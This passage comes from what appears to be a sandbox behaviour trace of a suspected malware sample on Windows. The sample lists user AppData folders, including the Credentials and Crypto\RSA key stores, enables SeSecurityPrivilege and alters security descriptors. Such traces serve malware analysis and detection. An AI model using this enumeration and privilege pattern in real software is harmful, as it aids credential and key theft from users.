pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0057.404] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb071d8 [0057.404] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0057.404] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0057.404] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.405] Sleep (dwMilliseconds=0x0) [0057.437] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0057.437] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.438] Sleep (dwMilliseconds=0x0) [0057.458] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0057.458] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.458] Sleep (dwMilliseconds=0x0) [0057.481] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.482] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0057.482] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned 0 [0057.482] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0057.482] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0057.482] Sleep (dwMilliseconds=0x0) [0057.497] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.497] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0057.497] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned 0 [0057.498] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="microsoft") returned 0x0 [0057.498] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="firefox") returned 0x0 [0057.498] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0057.498] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb07158 [0057.498] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.498] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.499] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0057.499] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 0 [0057.499] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="microsoft") returned 0x0 [0057.499] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="firefox") returned 0x0 [0057.499] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0057.499] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb071d8 [0057.500] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.500] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0057.500] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0057.500] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned 1 [0057.500] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="microsoft") returned 0x0 [0057.500] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="firefox") returned 0x0 [0057.500] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0057.500] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb07458 [0057.501] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0057.501] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0057.501] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0057.501] Sleep (dwMilliseconds=0x0) [0057.507] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0057.507] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.507] Sleep (dwMilliseconds=0x0) [0057.509] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0057.510] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.510] Sleep (dwMilliseconds=0x0) [0057.513] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0 [0057.513] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.514] GetCurrentThread () returned 0xfffffffe [0057.514] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x9ae6c4 | out: TokenHandle=0x9ae6c4*=0x0) returned 0 [0057.514] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x9ae6c4 | out: TokenHandle=0x9ae6c4*=0x210) returned 1 [0057.514] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x9ae6cc | out: lpLuid=0x9ae6cc*(LowPart=0x8, HighPart=0)) returned 1 [0057.515] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0x9ae6c8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0057.515] GetLastError () returned 0x0 [0057.515] CloseHandle (hObject=0x210) returned 1 [0057.515] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0057.515] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb0c658, lpbSaclPresent=0x9ae6fc, pSacl=0x9ae6f0, lpbSaclDefaulted=0x9ae6f8 | out: lpbSaclPresent=0x9ae6fc, pSacl=0x9ae6f0, lpbSaclDefaulted=0x9ae6f8) returned 1 [0057.515] SetNamedSecurityInfoW () returned 0x0 [0057.522] LocalFree (hMem=0xb0c658) returned 0x0 [0057.522] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0057.522] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0xb07498 [0057.523] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.523] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.523] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0057.523] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0057.523] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb070d8 [0057.523] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.523] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.523] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0057.524] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0057.524] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.524] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.524] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.524] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", pszSpec="*") returned 1 [0057.524] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.524] PathMatchSpecW (pszFile="Desktop (create shortcut).igb", pszSpec="*") returned 1 [0057.524] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.524] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0057.525] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0057.525] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07158 [0057.525] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.525] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.525] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.525] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.525] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.526] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.526] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.526] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.526] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0057.526] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*" [0057.526] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07418 [0057.526] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.526] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.526] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials" [0057.526] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0057.526] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb070d8 [0057.527] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.527] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.527] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.527] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.527] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto" [0057.527] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0057.527] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07458 [0057.527] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.527] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.527] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0057.527] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0057.527] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07558 [0057.528] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.528] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.528] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000" [0057.528] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0057.528] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb070d8 [0057.529] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.529] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.529] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0057.529] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.529] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0057.529] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.530] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.530] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.531] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.531] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.531] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0057.531] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.531] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0057.531] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0057.531] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07558 [0057.531] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.531] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.531] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0057.532] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0057.532] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07458 [0057.532] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.532] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.532] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.532] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.532] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0057.532] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.532] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0057.532] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.532] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0057.532] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0057.532] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb070d8 [0057.533] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.533] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.533] PathCombineW (in: pszDest=0x9ad2a8, 